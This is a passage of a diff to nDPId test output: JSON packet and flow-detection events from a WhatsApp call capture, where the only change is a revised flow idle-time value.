00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1432582238790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582238790,"pkt":"xiwDYGpkAPS5Jrv0CABFwACarW0AAEARhl7AqAIEHw1kDsk+DZYAhpcUAAMAaiESpEIAAHUQ+ENDH9BeI3lAAABmAQCp9g36qkiVOtLQr3ViX6FsbDYXjEJ9QGAivtjborGILbaLFUctqtKwjyuh8hQDpfay6HpQUwtK9uAMfRAxRJKoeR4kQioyDnAbRIAxuEByQdpCzZp5JzNQR7k0c+gy5xI4fd1T"} 00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} @@ -136,32 +136,32 @@ 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1432582239035,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582239035,"pkt":"APS5Jrv0xiwDYGpkCABFAABIsFoAAFQRjmEfDUYwwKgCBA2WyT4ANL3lAQMAGCESpEIAACUBlIyWX5N55xQAIAAIAAGRdm4xsYdAAgAIAAABTYyOMrg="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1432582239055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582239055,"pkt":"APS5Jrv0xiwDYGpkCABFAABI6QYAAFMRTSUfDU\/AwKgCBA2WyT4ANHa7AQMAGCESpEIAADsyhsRFd5d2aQUAIAAIAAGRdm4xsYdAAgAIAAABTYyOMuQ="} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1432582239083,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582239083,"pkt":"APS5Jrv0xiwDYGpkCABFAABIAeoAAFYRK9IfDVUwwKgCBA2WyT4ANFR5AQMAGCESpEIAADIU0Oi5cQTqY2QAIAAIAAGRdm4xsYdAAgAIAAABTYyOMuM="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582244297,"flow_last_seen":1432582244297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582244297,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1432582244297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244297,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAojkRAAEAGShnAqAIEEaeOH8AMAbt6TdZMbFoWmFAR\/\/+4DAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1432582244435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244435,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoqu8AAO0GwG0Rp44fwKgCBAG7wAxsWhaYek3WTVARn\/4YDQAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1432582244462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244462,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoPbFAAEAGmqzAqAIEEaeOH8AMAbt6TdZNbFoWmVAQ\/\/+4CwAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582245413,"flow_last_seen":1432582245413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582245413,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1432582245413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245413,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAodlRAAEAGjBvAqAIEEaxkCMAPAbv4S5DjkuqnU1AR\/\/\/yOgAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1432582245550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245550,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo3Q8AAO8Gtl8RrGQIwKgCBAG7wA+S6qdT+EuQ5FARn\/5SOwAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245576,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo\/ZBAAEAGBN\/AqAIEEaxkCMAPAbv4S5DkkuqnVFAQ\/\/\/yOQAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582244297,"flow_last_seen":1432582244297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582244297,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1432582244297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244297,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAojkRAAEAGShnAqAIEEaeOH8AMAbt6TdZMbFoWmFAR\/\/+4DAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1432582244435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244435,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoqu8AAO0GwG0Rp44fwKgCBAG7wAxsWhaYek3WTVARn\/4YDQAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1432582244462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244462,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoPbFAAEAGmqzAqAIEEaeOH8AMAbt6TdZNbFoWmVAQ\/\/+4CwAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582245413,"flow_last_seen":1432582245413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582245413,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1432582245413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245413,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAodlRAAEAGjBvAqAIEEaxkCMAPAbv4S5DjkuqnU1AR\/\/\/yOgAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1432582245550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245550,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo3Q8AAO8Gtl8RrGQIwKgCBAG7wA+S6qdT+EuQ5FARn\/5SOwAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1432582245576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245576,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo\/ZBAAEAGBN\/AqAIEEaxkCMAPAbv4S5DkkuqnVFAQ\/\/\/yOQAA"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01131{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1432582246280,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582246280,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISN8UAAEARusXAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1432582247125,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582247125,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIu7MAAEAROKHAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0VdFAAEAGLmvAqAIEXT6WncAqAbtp\/2UpB8hbNoARIADD5gAAAQEICi36g7kNLSlg"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo02tAAEAGBQTAqAIEEaeODcAuAbvUT3p65yrTtlAR\/\/+B3QAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1432582249291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249291,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0DlQAAG4Gh+hdPpadwKgCBAG7wCoHyFs2af9lKoARAgLVtQAAAQEICg0tNY4t+oO5"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1432582249292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249292,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0W3xAAEAGKMDAqAIEXT6WncAqAbtp\/2UqB8hbN4AQIAC3ZgAAAQEICi36hAoNLTWO"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1432582249385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249385,"pkt":"APS5Jrv0xiwDYGpkCABFAAAony8AAO4Gyz8Rp44NwKgCBAG7wC7nKtO21E96e1ARn\/7h3QAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1432582249492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249492,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo3x9AAEAG+U\/AqAIEEaeODcAuAbvUT3p75yrTt1AQ\/\/+B3AAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582250339,"flow_last_seen":1432582250339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582250339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1432582250339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250339,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoFBJAAEAGxF3AqAIEEaeODcAwAbsLr3wkAQ2ywFAR\/\/9P5gAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1432582250476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250476,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoVmEAAO4GFA4Rp44NwKgCBAG7wDABDbLAC698JVARn\/6v5gAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250618,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAotpxAAEAGIdPAqAIEEaeODcAwAbsLr3wlAQ2ywVAQ\/\/9P5QAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0VdFAAEAGLmvAqAIEXT6WncAqAbtp\/2UpB8hbNoARIADD5gAAAQEICi36g7kNLSlg"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo02tAAEAGBQTAqAIEEaeODcAuAbvUT3p65yrTtlAR\/\/+B3QAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1432582249291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249291,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0DlQAAG4Gh+hdPpadwKgCBAG7wCoHyFs2af9lKoARAgLVtQAAAQEICg0tNY4t+oO5"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1432582249292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249292,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0W3xAAEAGKMDAqAIEXT6WncAqAbtp\/2UqB8hbN4AQIAC3ZgAAAQEICi36hAoNLTWO"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1432582249385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249385,"pkt":"APS5Jrv0xiwDYGpkCABFAAAony8AAO4Gyz8Rp44NwKgCBAG7wC7nKtO21E96e1ARn\/7h3QAA"} 